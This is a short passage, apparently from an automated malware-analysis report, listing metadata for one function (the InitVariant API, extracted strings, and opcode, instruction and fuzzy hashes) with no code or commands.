                                                                                                                                                                                                                                              • API ID: InitVariant
                                                                                                                                                                                                                                              • String ID: A$B$B$D$K$M$j$q$w$y
                                                                                                                                                                                                                                              • API String ID: 1927566239-3160828158
                                                                                                                                                                                                                                              • Opcode ID: 7f57d2f955bee908355d8fd01dba06b5de51746897798e592b4db9ffe3b1190f
                                                                                                                                                                                                                                              • Instruction ID: 575a33c2bbd7ff99dca50b32287f816acec3958bb7f60f4ff709e3e1a19757a2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f57d2f955bee908355d8fd01dba06b5de51746897798e592b4db9ffe3b1190f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B841287050CBC18AD335DB38845879EBFD16BD2214F188A5DE2E98B3E2D7B88149CB53